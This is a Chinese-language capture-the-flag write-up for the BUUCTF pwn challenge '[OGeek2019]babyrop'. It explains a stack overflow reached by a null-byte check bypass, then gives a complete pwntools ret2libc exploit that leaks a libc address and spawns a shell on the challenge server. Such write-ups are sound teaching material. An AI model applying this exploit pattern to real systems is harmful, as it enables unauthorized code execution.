BUUCTF-PWN-[OGeek2019]babyrop

这题需要用到一些plt和got等的前置知识,可以参考:https://bbs.pediy.com/thread-262357.htm

checksec

image-20211113131237228

IDA

image-20211113131844182

image-20211113131909584

sub_804871F函数的返回值就是下面sub_80487D0的参数(v5 --> a1

image-20211113131926631

而在sub_80487D0中第二个read函数是可能的溢出点,条件是a1 != 127并且a1大于buf的长度

之后利用题目给出的libc,使用ret2libc的方法拿到shell

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from pwn import *

p = remote('node4.buuoj.cn', 25034)
elf = ELF('./pwn')
libc = ELF('libc-2.23.so')

write_plt = elf.plt['write']
main_addr = 0x08048825
write_got = elf.got['write']

payload1 = b'\0' + b'a' * 6 + b'\xff'
p.sendline(payload1)

payload2 = b'a' * (0xe7 + 4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
#          # 覆盖buf        # 溢出到write的plt表 # write返回到main   # write(1, write_got, 4)

p.recvuntil('Correct\n')
p.sendline(payload2)
write_addr = u32(p.recv(4))
print(hex(write_addr))

libc_base = write_addr - libc.symbols['write']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search('/bin/sh'.encode()))

p.sendline(payload1)
p.recvuntil('Correct\n')

paylaod3 = b'a' * (0xe7 + 4) + p32(system_addr) + p32(0) + p32(binsh_addr)

p.sendline(paylaod3)

p.interactive()

p.sendline()

结果

image-20211113132600072